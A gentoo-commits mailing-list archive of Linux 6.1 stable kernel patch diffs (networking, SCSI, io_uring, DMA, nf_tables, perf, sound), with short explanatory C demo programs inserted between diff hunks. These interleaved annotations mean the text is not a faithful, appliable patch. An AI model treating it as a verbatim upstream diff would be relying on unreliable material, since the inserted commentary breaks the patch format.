+ void *skb_push(struct sk_buff *skb, unsigned int len);
+ static inline void *__skb_push(struct sk_buff *skb, unsigned int len)
+ {
++	DEBUG_NET_WARN_ON_ONCE(len > INT_MAX);
++
+ 	skb->data -= len;
+ 	skb->len  += len;
+ 	return skb->data;
+@@ -2611,6 +2613,8 @@ static inline void *__skb_push(struct sk_buff *skb, unsigned int len)
+ void *skb_pull(struct sk_buff *skb, unsigned int len);
+ static inline void *__skb_pull(struct sk_buff *skb, unsigned int len)
+ {
++	DEBUG_NET_WARN_ON_ONCE(len > INT_MAX);
++
+ 	skb->len -= len;
+ 	if (unlikely(skb->len < skb->data_len)) {
+ #if defined(CONFIG_DEBUG_NET)
+@@ -2634,6 +2638,8 @@ void *__pskb_pull_tail(struct sk_buff *skb, int delta);
+ 
+ static inline bool pskb_may_pull(struct sk_buff *skb, unsigned int len)
+ {
++	DEBUG_NET_WARN_ON_ONCE(len > INT_MAX);
++
+ 	if (likely(len <= skb_headlen(skb)))
+ 		return true;
+ 	if (unlikely(len > skb->len))
+@@ -2796,6 +2802,11 @@ static inline void skb_set_inner_network_header(struct sk_buff *skb,
+ 	skb->inner_network_header += offset;
+ }
+ 
++static inline bool skb_inner_network_header_was_set(const struct sk_buff *skb)
++{
++	return skb->inner_network_header > 0;
++}
++
+ static inline unsigned char *skb_inner_mac_header(const struct sk_buff *skb)
+ {
+ 	return skb->head + skb->inner_mac_header;
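
The new skbuff warnings catch a classic caller bug: a negative int length silently converts to a huge unsigned value, and len > INT_MAX is exactly the signature of that conversion. A small demonstration of the check:

#include <limits.h>
#include <stdio.h>

static int check_len(unsigned int len)
{
	if (len > INT_MAX) {	/* a negative int was converted somewhere */
		fprintf(stderr, "bogus length %u\n", len);
		return -1;
	}
	return 0;
}

int main(void)
{
	int broken_delta = -4;	/* e.g. a miscomputed header size */

	check_len(16);				/* fine */
	check_len((unsigned int)broken_delta);	/* trips: 4294967292 */
	return 0;
}
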
+diff --git a/include/linux/sunrpc/sched.h b/include/linux/sunrpc/sched.h
+index 8ada7dc802d30..8f9bee0e21c3b 100644
+--- a/include/linux/sunrpc/sched.h
++++ b/include/linux/sunrpc/sched.h
+@@ -186,7 +186,7 @@ struct rpc_wait_queue {
+ 	unsigned char		maxpriority;		/* maximum priority (0 if queue is not a priority queue) */
+ 	unsigned char		priority;		/* current priority */
+ 	unsigned char		nr;			/* # tasks remaining for cookie */
+-	unsigned short		qlen;			/* total # tasks waiting in queue */
++	unsigned int		qlen;			/* total # tasks waiting in queue */
+ 	struct rpc_timer	timer_list;
+ #if IS_ENABLED(CONFIG_SUNRPC_DEBUG) || IS_ENABLED(CONFIG_TRACEPOINTS)
+ 	const char *		name;
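
The sunrpc widening matters because with more than 65535 queued tasks an unsigned short qlen silently wraps to a small number, corrupting the accounting. A two-line demonstration of the wrap:

#include <stdio.h>

int main(void)
{
	unsigned short qlen16 = 0;
	unsigned int qlen32 = 0;
	unsigned long i;

	for (i = 0; i < 70000; i++) {	/* queue 70000 tasks */
		qlen16++;
		qlen32++;
	}
	printf("16-bit counter: %u (wrapped), 32-bit counter: %u\n",
	       qlen16, qlen32);		/* 4464 vs 70000 */
	return 0;
}
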
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index a64713fe52640..1504d3137cc69 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -480,51 +480,28 @@ extern const char *scsi_device_state_name(enum scsi_device_state);
+ extern int scsi_is_sdev_device(const struct device *);
+ extern int scsi_is_target_device(const struct device *);
+ extern void scsi_sanitize_inquiry_string(unsigned char *s, int len);
+-
+-/* Optional arguments to scsi_execute_cmd */
+-struct scsi_exec_args {
+-	unsigned char *sense;		/* sense buffer */
+-	unsigned int sense_len;		/* sense buffer len */
+-	struct scsi_sense_hdr *sshdr;	/* decoded sense header */
+-	blk_mq_req_flags_t req_flags;	/* BLK_MQ_REQ flags */
+-	int *resid;			/* residual length */
+-};
+-
+-int scsi_execute_cmd(struct scsi_device *sdev, const unsigned char *cmd,
+-		     blk_opf_t opf, void *buffer, unsigned int bufflen,
+-		     int timeout, int retries,
+-		     const struct scsi_exec_args *args);
+-
++extern int __scsi_execute(struct scsi_device *sdev, const unsigned char *cmd,
++			int data_direction, void *buffer, unsigned bufflen,
++			unsigned char *sense, struct scsi_sense_hdr *sshdr,
++			int timeout, int retries, blk_opf_t flags,
++			req_flags_t rq_flags, int *resid);
+ /* Make sure any sense buffer is the correct size. */
+-#define scsi_execute(_sdev, _cmd, _data_dir, _buffer, _bufflen, _sense,	\
+-		     _sshdr, _timeout, _retries, _flags, _rq_flags,	\
+-		     _resid)						\
++#define scsi_execute(sdev, cmd, data_direction, buffer, bufflen, sense,	\
++		     sshdr, timeout, retries, flags, rq_flags, resid)	\
+ ({									\
+-	scsi_execute_cmd(_sdev, _cmd, (_data_dir == DMA_TO_DEVICE ?	\
+-			 REQ_OP_DRV_OUT : REQ_OP_DRV_IN) | _flags,	\
+-			 _buffer, _bufflen, _timeout, _retries,	\
+-			 &(struct scsi_exec_args) {			\
+-				.sense = _sense,			\
+-				.sshdr = _sshdr,			\
+-				.req_flags = _rq_flags & RQF_PM  ?	\
+-						BLK_MQ_REQ_PM : 0,	\
+-				.resid = _resid,			\
+-			 });						\
++	BUILD_BUG_ON((sense) != NULL &&					\
++		     sizeof(sense) != SCSI_SENSE_BUFFERSIZE);		\
++	__scsi_execute(sdev, cmd, data_direction, buffer, bufflen,	\
++		       sense, sshdr, timeout, retries, flags, rq_flags,	\
++		       resid);						\
+ })
+-
+ static inline int scsi_execute_req(struct scsi_device *sdev,
+ 	const unsigned char *cmd, int data_direction, void *buffer,
+ 	unsigned bufflen, struct scsi_sense_hdr *sshdr, int timeout,
+ 	int retries, int *resid)
+ {
+-	return scsi_execute_cmd(sdev, cmd,
+-				data_direction == DMA_TO_DEVICE ?
+-				REQ_OP_DRV_OUT : REQ_OP_DRV_IN, buffer,
+-				bufflen, timeout, retries,
+-				&(struct scsi_exec_args) {
+-					.sshdr = sshdr,
+-					.resid = resid,
+-				});
++	return scsi_execute(sdev, cmd, data_direction, buffer,
++		bufflen, NULL, sshdr, timeout, retries,  0, 0, resid);
+ }
+ extern void sdev_disable_disk_events(struct scsi_device *sdev);
+ extern void sdev_enable_disk_events(struct scsi_device *sdev);
+diff --git a/include/uapi/linux/input-event-codes.h b/include/uapi/linux/input-event-codes.h
+index 7ad931a329706..1ce8a91349e9f 100644
+--- a/include/uapi/linux/input-event-codes.h
++++ b/include/uapi/linux/input-event-codes.h
+@@ -602,6 +602,7 @@
+ 
+ #define KEY_ALS_TOGGLE		0x230	/* Ambient light sensor */
+ #define KEY_ROTATE_LOCK_TOGGLE	0x231	/* Display rotation lock */
++#define KEY_REFRESH_RATE_TOGGLE	0x232	/* Display refresh rate toggle */
+ 
+ #define KEY_BUTTONCONFIG		0x240	/* AL Button Configuration */
+ #define KEY_TASKMANAGER		0x241	/* AL Task/Project Manager */
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 415248c1f82c6..68f1b6f8699a6 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1978,6 +1978,13 @@ static void io_init_req_drain(struct io_kiocb *req)
+ 	}
+ }
+ 
++static __cold int io_init_fail_req(struct io_kiocb *req, int err)
++{
++	/* ensure per-opcode data is cleared if we fail before prep */
++	memset(&req->cmd.data, 0, sizeof(req->cmd.data));
++	return err;
++}
++
+ static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
+ 		       const struct io_uring_sqe *sqe)
+ 	__must_hold(&ctx->uring_lock)
+@@ -1998,29 +2005,29 @@ static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
+ 
+ 	if (unlikely(opcode >= IORING_OP_LAST)) {
+ 		req->opcode = 0;
+-		return -EINVAL;
++		return io_init_fail_req(req, -EINVAL);
+ 	}
+ 	def = &io_op_defs[opcode];
+ 	if (unlikely(sqe_flags & ~SQE_COMMON_FLAGS)) {
+ 		/* enforce forwards compatibility on users */
+ 		if (sqe_flags & ~SQE_VALID_FLAGS)
+-			return -EINVAL;
++			return io_init_fail_req(req, -EINVAL);
+ 		if (sqe_flags & IOSQE_BUFFER_SELECT) {
+ 			if (!def->buffer_select)
+-				return -EOPNOTSUPP;
++				return io_init_fail_req(req, -EOPNOTSUPP);
+ 			req->buf_index = READ_ONCE(sqe->buf_group);
+ 		}
+ 		if (sqe_flags & IOSQE_CQE_SKIP_SUCCESS)
+ 			ctx->drain_disabled = true;
+ 		if (sqe_flags & IOSQE_IO_DRAIN) {
+ 			if (ctx->drain_disabled)
+-				return -EOPNOTSUPP;
++				return io_init_fail_req(req, -EOPNOTSUPP);
+ 			io_init_req_drain(req);
+ 		}
+ 	}
+ 	if (unlikely(ctx->restricted || ctx->drain_active || ctx->drain_next)) {
+ 		if (ctx->restricted && !io_check_restriction(ctx, req, sqe_flags))
+-			return -EACCES;
++			return io_init_fail_req(req, -EACCES);
+ 		/* knock it to the slow queue path, will be drained there */
+ 		if (ctx->drain_active)
+ 			req->flags |= REQ_F_FORCE_ASYNC;
+@@ -2033,9 +2040,9 @@ static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
+ 	}
+ 
+ 	if (!def->ioprio && sqe->ioprio)
+-		return -EINVAL;
++		return io_init_fail_req(req, -EINVAL);
+ 	if (!def->iopoll && (ctx->flags & IORING_SETUP_IOPOLL))
+-		return -EINVAL;
++		return io_init_fail_req(req, -EINVAL);
+ 
+ 	if (def->needs_file) {
+ 		struct io_submit_state *state = &ctx->submit_state;
+@@ -2059,12 +2066,12 @@ static int io_init_req(struct io_ring_ctx *ctx, struct io_kiocb *req,
+ 
+ 		req->creds = xa_load(&ctx->personalities, personality);
+ 		if (!req->creds)
+-			return -EINVAL;
++			return io_init_fail_req(req, -EINVAL);
+ 		get_cred(req->creds);
+ 		ret = security_uring_override_creds(req->creds);
+ 		if (ret) {
+ 			put_cred(req->creds);
+-			return ret;
++			return io_init_fail_req(req, ret);
+ 		}
+ 		req->flags |= REQ_F_CREDS;
+ 	}
+diff --git a/kernel/dma/direct.c b/kernel/dma/direct.c
+index 63859a101ed83..d4215739efc71 100644
+--- a/kernel/dma/direct.c
++++ b/kernel/dma/direct.c
+@@ -296,7 +296,7 @@ void *dma_direct_alloc(struct device *dev, size_t size,
+ 	} else {
+ 		ret = page_address(page);
+ 		if (dma_set_decrypted(dev, ret, size))
+-			goto out_free_pages;
++			goto out_leak_pages;
+ 	}
+ 
+ 	memset(ret, 0, size);
+@@ -317,6 +317,8 @@ void *dma_direct_alloc(struct device *dev, size_t size,
+ out_free_pages:
+ 	__dma_direct_free_pages(dev, page, size);
+ 	return NULL;
++out_leak_pages:
++	return NULL;
+ }
+ 
+ void dma_direct_free(struct device *dev, size_t size,
+@@ -379,12 +381,11 @@ struct page *dma_direct_alloc_pages(struct device *dev, size_t size,
+ 
+ 	ret = page_address(page);
+ 	if (dma_set_decrypted(dev, ret, size))
+-		goto out_free_pages;
++		goto out_leak_pages;
+ 	memset(ret, 0, size);
+ 	*dma_handle = phys_to_dma_direct(dev, page_to_phys(page));
+ 	return page;
+-out_free_pages:
+-	__dma_direct_free_pages(dev, page, size);
++out_leak_pages:
+ 	return NULL;
+ }
+ 
+diff --git a/kernel/panic.c b/kernel/panic.c
+index 63e94f3bd8dcd..e6c2bf04a32c0 100644
+--- a/kernel/panic.c
++++ b/kernel/panic.c
+@@ -441,6 +441,14 @@ void panic(const char *fmt, ...)
+ 
+ 	/* Do not scroll important messages printed above */
+ 	suppress_printk = 1;
++
++	/*
++	 * The final messages may not have been printed if in a context that
++	 * defers printing (such as NMI) and irq_work is not available.
++	 * Explicitly flush the kernel log buffer one last time.
++	 */
++	console_flush_on_panic(CONSOLE_FLUSH_PENDING);
++
+ 	local_irq_enable();
+ 	for (i = 0; ; i += PANIC_TIMER_STEP) {
+ 		touch_softlockup_watchdog();
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 431a922e5c89e..d2947de3021a9 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -4431,7 +4431,7 @@ int ring_buffer_iter_empty(struct ring_buffer_iter *iter)
+ 	cpu_buffer = iter->cpu_buffer;
+ 	reader = cpu_buffer->reader_page;
+ 	head_page = cpu_buffer->head_page;
+-	commit_page = cpu_buffer->commit_page;
++	commit_page = READ_ONCE(cpu_buffer->commit_page);
+ 	commit_ts = commit_page->page->time_stamp;
+ 
+ 	/*
+diff --git a/net/mpls/mpls_gso.c b/net/mpls/mpls_gso.c
+index 1482259de9b5d..40334d4d89dea 100644
+--- a/net/mpls/mpls_gso.c
++++ b/net/mpls/mpls_gso.c
+@@ -26,6 +26,9 @@ static struct sk_buff *mpls_gso_segment(struct sk_buff *skb,
+ 	__be16 mpls_protocol;
+ 	unsigned int mpls_hlen;
+ 
++	if (!skb_inner_network_header_was_set(skb))
++		goto out;
++
+ 	skb_reset_network_header(skb);
+ 	mpls_hlen = skb_inner_network_header(skb) - skb_network_header(skb);
+ 	if (unlikely(!mpls_hlen || mpls_hlen % MPLS_HLEN))
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 8d38cd5047692..8152a69d82681 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -1192,6 +1192,24 @@ static void nf_tables_table_disable(struct net *net, struct nft_table *table)
+ #define __NFT_TABLE_F_UPDATE		(__NFT_TABLE_F_WAS_DORMANT | \
+ 					 __NFT_TABLE_F_WAS_AWAKEN)
+ 
++static bool nft_table_pending_update(const struct nft_ctx *ctx)
++{
++	struct nftables_pernet *nft_net = nft_pernet(ctx->net);
++	struct nft_trans *trans;
++
++	if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
++		return true;
++
++	list_for_each_entry(trans, &nft_net->commit_list, list) {
++		if (trans->ctx.table == ctx->table &&
++		    trans->msg_type == NFT_MSG_DELCHAIN &&
++		    nft_is_base_chain(trans->ctx.chain))
++			return true;
++	}
++
++	return false;
++}
++
+ static int nf_tables_updtable(struct nft_ctx *ctx)
+ {
+ 	struct nft_trans *trans;
+@@ -1215,7 +1233,7 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
+ 		return -EOPNOTSUPP;
+ 
+ 	/* No dormant off/on/off/on games in single transaction */
+-	if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
++	if (nft_table_pending_update(ctx))
+ 		return -EINVAL;
+ 
+ 	trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE,
+@@ -9902,10 +9920,11 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 	struct nft_trans *trans, *next;
+ 	LIST_HEAD(set_update_list);
+ 	struct nft_trans_elem *te;
++	int err = 0;
+ 
+ 	if (action == NFNL_ABORT_VALIDATE &&
+ 	    nf_tables_validate(net) < 0)
+-		return -EAGAIN;
++		err = -EAGAIN;
+ 
+ 	list_for_each_entry_safe_reverse(trans, next, &nft_net->commit_list,
+ 					 list) {
+@@ -10076,12 +10095,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 		nf_tables_abort_release(trans);
+ 	}
+ 
+-	if (action == NFNL_ABORT_AUTOLOAD)
+-		nf_tables_module_autoload(net);
+-	else
+-		nf_tables_module_autoload_cleanup(net);
+-
+-	return 0;
++	return err;
+ }
+ 
+ static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+@@ -10095,6 +10109,16 @@ static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+ 	ret = __nf_tables_abort(net, action);
+ 	nft_gc_seq_end(nft_net, gc_seq);
+ 
++	WARN_ON_ONCE(!list_empty(&nft_net->commit_list));
++
++	/* module autoload needs to happen after GC sequence update because it
++	 * temporarily releases and grabs mutex again.
++	 */
++	if (action == NFNL_ABORT_AUTOLOAD)
++		nf_tables_module_autoload(net);
++	else
++		nf_tables_module_autoload_cleanup(net);
++
+ 	mutex_unlock(&nft_net->commit_mutex);
+ 
+ 	return ret;
+@@ -10892,9 +10916,10 @@ static void __net_exit nf_tables_exit_net(struct net *net)
+ 
+ 	gc_seq = nft_gc_seq_begin(nft_net);
+ 
+-	if (!list_empty(&nft_net->commit_list) ||
+-	    !list_empty(&nft_net->module_list))
+-		__nf_tables_abort(net, NFNL_ABORT_NONE);
++	WARN_ON_ONCE(!list_empty(&nft_net->commit_list));
++
++	if (!list_empty(&nft_net->module_list))
++		nf_tables_module_autoload_cleanup(net);
+ 
+ 	__nft_release_tables(net);
+ 
+diff --git a/net/smc/smc_pnet.c b/net/smc/smc_pnet.c
+index 25fb2fd186e22..21b8bf23e4ee6 100644
+--- a/net/smc/smc_pnet.c
++++ b/net/smc/smc_pnet.c
+@@ -802,6 +802,16 @@ static void smc_pnet_create_pnetids_list(struct net *net)
+ 	u8 ndev_pnetid[SMC_MAX_PNETID_LEN];
+ 	struct net_device *dev;
+ 
++	/* Newly created netns do not have devices.
++	 * Do not even acquire rtnl.
++	 */
++	if (list_empty(&net->dev_base_head))
++		return;
++
++	/* Note: This might not be needed, because smc_pnet_netdev_event()
++	 * is also calling smc_pnet_add_base_pnetid() when handling
++	 * NETDEV_UP event.
++	 */
+ 	rtnl_lock();
+ 	for_each_netdev(net, dev)
+ 		smc_pnet_add_base_pnetid(net, dev, ndev_pnetid);
+diff --git a/scripts/gcc-plugins/stackleak_plugin.c b/scripts/gcc-plugins/stackleak_plugin.c
+index c5c2ce113c923..d20c47d21ad83 100644
+--- a/scripts/gcc-plugins/stackleak_plugin.c
++++ b/scripts/gcc-plugins/stackleak_plugin.c
+@@ -467,6 +467,8 @@ static bool stackleak_gate(void)
+ 			return false;
+ 		if (STRING_EQUAL(section, ".entry.text"))
+ 			return false;
++		if (STRING_EQUAL(section, ".head.text"))
++			return false;
+ 	}
+ 
+ 	return track_frame_size >= 0;
+diff --git a/sound/firewire/amdtp-stream.c b/sound/firewire/amdtp-stream.c
+index f8b644cb9157a..8753125683692 100644
+--- a/sound/firewire/amdtp-stream.c
++++ b/sound/firewire/amdtp-stream.c
+@@ -771,10 +771,14 @@ static int check_cip_header(struct amdtp_stream *s, const __be32 *buf,
+ 	} else {
+ 		unsigned int dbc_interval;
+ 
+-		if (*data_blocks > 0 && s->ctx_data.tx.dbc_interval > 0)
+-			dbc_interval = s->ctx_data.tx.dbc_interval;
+-		else
+-			dbc_interval = *data_blocks;
++		if (!(s->flags & CIP_DBC_IS_PAYLOAD_QUADLETS)) {
++			if (*data_blocks > 0 && s->ctx_data.tx.dbc_interval > 0)
++				dbc_interval = s->ctx_data.tx.dbc_interval;
++			else
++				dbc_interval = *data_blocks;
++		} else {
++			dbc_interval = payload_length / sizeof(__be32);
++		}
+ 
+ 		lost = dbc != ((*data_block_counter + dbc_interval) & 0xff);
+ 	}
+diff --git a/sound/firewire/amdtp-stream.h b/sound/firewire/amdtp-stream.h
+index 1f957c946c956..cf9ab347277f2 100644
+--- a/sound/firewire/amdtp-stream.h
++++ b/sound/firewire/amdtp-stream.h
+@@ -37,6 +37,9 @@
+  *	the value of current SYT_INTERVAL; e.g. initial value is not zero.
+  * @CIP_UNAWARE_SYT: For outgoing packet, the value in SYT field of CIP is 0xffff.
+  *	For incoming packet, the value in SYT field of CIP is not handled.
++ * @CIP_DBC_IS_PAYLOAD_QUADLETS: Available for incoming packet, and only effective with
++ *	CIP_DBC_IS_END_EVENT flag. The value of dbc field is the number of accumulated quadlets
++ *	in CIP payload, instead of the number of accumulated data blocks.
+  */
+ enum cip_flags {
+ 	CIP_NONBLOCKING		= 0x00,
+@@ -51,6 +54,7 @@ enum cip_flags {
+ 	CIP_NO_HEADER		= 0x100,
+ 	CIP_UNALIGHED_DBC	= 0x200,
+ 	CIP_UNAWARE_SYT		= 0x400,
++	CIP_DBC_IS_PAYLOAD_QUADLETS = 0x800,
+ };
+ 
+ /**
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index 985012f2003e2..d1e6e4208c376 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -224,6 +224,17 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 					SOF_SDW_PCH_DMIC |
+ 					RT711_JD2_100K),
+ 	},
++	{
++		/* NUC15 LAPRC710 skews */
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "LAPRC710"),
++		},
++		.driver_data = (void *)(SOF_SDW_TGL_HDMI |
++					SOF_SDW_PCH_DMIC |
++					RT711_JD2_100K),
++	},
+ 	/* TigerLake-SDCA devices */
+ 	{
+ 		.callback = sof_sdw_quirk_cb,
+diff --git a/sound/soc/soc-core.c b/sound/soc/soc-core.c
+index a409fbed8f34c..6a4101dc15a54 100644
+--- a/sound/soc/soc-core.c
++++ b/sound/soc/soc-core.c
+@@ -1020,6 +1020,9 @@ int snd_soc_add_pcm_runtime(struct snd_soc_card *card,
+ 			if (!snd_soc_is_matching_component(platform, component))
+ 				continue;
+ 
++			if (snd_soc_component_is_dummy(component) && component->num_dai)
++				continue;
++
+ 			snd_soc_rtd_add_component(rtd, component);
+ 		}
+ 	}
+diff --git a/tools/iio/iio_utils.c b/tools/iio/iio_utils.c
+index 6a00a6eecaef0..c5c5082cb24e5 100644
+--- a/tools/iio/iio_utils.c
++++ b/tools/iio/iio_utils.c
+@@ -376,7 +376,7 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 		goto error_close_dir;
+ 	}
+ 
+-	seekdir(dp, 0);
++	rewinddir(dp);
+ 	while (ent = readdir(dp), ent) {
+ 		if (strcmp(ent->d_name + strlen(ent->d_name) - strlen("_en"),
+ 			   "_en") == 0) {
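
The iio_utils change is a portability fix: seekdir(dp, 0) only returns to the start if 0 happens to be a valid position cookie on that filesystem, whereas rewinddir(3) is defined to do so everywhere. A runnable two-pass directory walk showing the portable rewind:

#include <dirent.h>
#include <stdio.h>

int main(void)
{
	DIR *dp = opendir(".");
	struct dirent *ent;
	int first_pass = 0, second_pass = 0;

	if (!dp)
		return 1;
	while ((ent = readdir(dp)))
		first_pass++;

	rewinddir(dp);	/* portable; seekdir(dp, 0) is not */

	while ((ent = readdir(dp)))
		second_pass++;
	printf("%d entries, then %d after rewinddir()\n",
	       first_pass, second_pass);
	closedir(dp);
	return 0;
}
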
+diff --git a/tools/lib/perf/evlist.c b/tools/lib/perf/evlist.c
+index 61b637f29b827..b871923c7e5cd 100644
+--- a/tools/lib/perf/evlist.c
++++ b/tools/lib/perf/evlist.c
+@@ -233,10 +233,10 @@ u64 perf_evlist__read_format(struct perf_evlist *evlist)
+ 
+ static void perf_evlist__id_hash(struct perf_evlist *evlist,
+ 				 struct perf_evsel *evsel,
+-				 int cpu, int thread, u64 id)
++				 int cpu_map_idx, int thread, u64 id)
+ {
+ 	int hash;
+-	struct perf_sample_id *sid = SID(evsel, cpu, thread);
++	struct perf_sample_id *sid = SID(evsel, cpu_map_idx, thread);
+ 
+ 	sid->id = id;
+ 	sid->evsel = evsel;
+@@ -254,21 +254,27 @@ void perf_evlist__reset_id_hash(struct perf_evlist *evlist)
+ 
+ void perf_evlist__id_add(struct perf_evlist *evlist,
+ 			 struct perf_evsel *evsel,
+-			 int cpu, int thread, u64 id)
++			 int cpu_map_idx, int thread, u64 id)
+ {
+-	perf_evlist__id_hash(evlist, evsel, cpu, thread, id);
++	if (!SID(evsel, cpu_map_idx, thread))
++		return;
++
++	perf_evlist__id_hash(evlist, evsel, cpu_map_idx, thread, id);
+ 	evsel->id[evsel->ids++] = id;
+ }
+ 
+ int perf_evlist__id_add_fd(struct perf_evlist *evlist,
+ 			   struct perf_evsel *evsel,
+-			   int cpu, int thread, int fd)
++			   int cpu_map_idx, int thread, int fd)
+ {
+ 	u64 read_data[4] = { 0, };
+ 	int id_idx = 1; /* The first entry is the counter value */
+ 	u64 id;
+ 	int ret;
+ 
++	if (!SID(evsel, cpu_map_idx, thread))
++		return -1;
++
+ 	ret = ioctl(fd, PERF_EVENT_IOC_ID, &id);
+ 	if (!ret)
+ 		goto add;
+@@ -297,7 +303,7 @@ int perf_evlist__id_add_fd(struct perf_evlist *evlist,
+ 	id = read_data[id_idx];
+ 
+ add:
+-	perf_evlist__id_add(evlist, evsel, cpu, thread, id);
++	perf_evlist__id_add(evlist, evsel, cpu_map_idx, thread, id);
+ 	return 0;
+ }
+ 
+diff --git a/tools/lib/perf/include/internal/evlist.h b/tools/lib/perf/include/internal/evlist.h
+index 850f07070036c..cf77db75291b9 100644
+--- a/tools/lib/perf/include/internal/evlist.h
++++ b/tools/lib/perf/include/internal/evlist.h
+@@ -127,11 +127,11 @@ u64 perf_evlist__read_format(struct perf_evlist *evlist);
+ 
+ void perf_evlist__id_add(struct perf_evlist *evlist,
+ 			 struct perf_evsel *evsel,
+-			 int cpu, int thread, u64 id);
++			 int cpu_map_idx, int thread, u64 id);
+ 
+ int perf_evlist__id_add_fd(struct perf_evlist *evlist,
+ 			   struct perf_evsel *evsel,
+-			   int cpu, int thread, int fd);
++			   int cpu_map_idx, int thread, int fd);
+ 
+ void perf_evlist__reset_id_hash(struct perf_evlist *evlist);
+ 
+diff --git a/tools/power/x86/x86_energy_perf_policy/x86_energy_perf_policy.c b/tools/power/x86/x86_energy_perf_policy/x86_energy_perf_policy.c
+index 5fd9e594079cf..ebda9c366b2ba 100644
+--- a/tools/power/x86/x86_energy_perf_policy/x86_energy_perf_policy.c
++++ b/tools/power/x86/x86_energy_perf_policy/x86_energy_perf_policy.c
+@@ -1241,6 +1241,7 @@ unsigned int get_pkg_num(int cpu)
+ 	retval = fscanf(fp, "%d\n", &pkg);
+ 	if (retval != 1)
+ 		errx(1, "%s: failed to parse", pathname);
++	fclose(fp);
+ 	return pkg;
+ }
+ 
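
The x86_energy_perf_policy fix plugs a FILE leak: get_pkg_num() is called per CPU, and every fopen() without a matching fclose() holds a descriptor until the process hits its limit. A minimal sketch of the corrected shape (the path here is just an illustrative integer-valued file):

#include <stdio.h>

static int read_one_int(const char *path, int *val)
{
	FILE *fp = fopen(path, "r");
	int ret;

	if (!fp)
		return -1;
	ret = fscanf(fp, "%d\n", val);
	fclose(fp);	/* close on every exit, success or not */
	return ret == 1 ? 0 : -1;
}

int main(void)
{
	int val;

	if (read_one_int("/proc/sys/kernel/pid_max", &val) == 0)
		printf("value: %d\n", val);
	return 0;
}
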
+diff --git a/tools/testing/ktest/ktest.pl b/tools/testing/ktest/ktest.pl
+index e6c381498e632..449e45bd69665 100755
+--- a/tools/testing/ktest/ktest.pl
++++ b/tools/testing/ktest/ktest.pl
+@@ -836,6 +836,7 @@ sub set_value {
+     if ($lvalue =~ /^(TEST|BISECT|CONFIG_BISECT)_TYPE(\[.*\])?$/ &&
+ 	$prvalue !~ /^(config_|)bisect$/ &&
+ 	$prvalue !~ /^build$/ &&
++	$prvalue !~ /^make_warnings_file$/ &&
+ 	$buildonly) {
+ 
+ 	# Note if a test is something other than build, then we


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-10 15:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-10 15:10 UTC (permalink / raw
  To: gentoo-commits

commit:     49ba92d62375919c01f82e22cc6536ec6f37375c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Apr 10 15:10:08 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Apr 10 15:10:08 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=49ba92d6

Linux patch 6.1.85

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1084_linux-6.1.85.patch | 6161 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6165 insertions(+)

diff --git a/0000_README b/0000_README
index 55224b04..beb8ee68 100644
--- a/0000_README
+++ b/0000_README
@@ -379,6 +379,10 @@ Patch:  1083_linux-6.1.84.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.84
 
+Patch:  1084_linux-6.1.85.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.85
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1084_linux-6.1.85.patch b/1084_linux-6.1.85.patch
new file mode 100644
index 00000000..e0ba4a2c
--- /dev/null
+++ b/1084_linux-6.1.85.patch
@@ -0,0 +1,6161 @@
+diff --git a/Documentation/admin-guide/hw-vuln/spectre.rst b/Documentation/admin-guide/hw-vuln/spectre.rst
+index 32a8893e56177..9edb2860a3e19 100644
+--- a/Documentation/admin-guide/hw-vuln/spectre.rst
++++ b/Documentation/admin-guide/hw-vuln/spectre.rst
+@@ -138,11 +138,10 @@ associated with the source address of the indirect branch. Specifically,
+ the BHB might be shared across privilege levels even in the presence of
+ Enhanced IBRS.
+ 
+-Currently the only known real-world BHB attack vector is via
+-unprivileged eBPF. Therefore, it's highly recommended to not enable
+-unprivileged eBPF, especially when eIBRS is used (without retpolines).
+-For a full mitigation against BHB attacks, it's recommended to use
+-retpolines (or eIBRS combined with retpolines).
++Previously the only known real-world BHB attack vector was via unprivileged
++eBPF. Further research has found attacks that don't require unprivileged eBPF.
++For a full mitigation against BHB attacks it is recommended to set BHI_DIS_S or
++use the BHB clearing sequence.
+ 
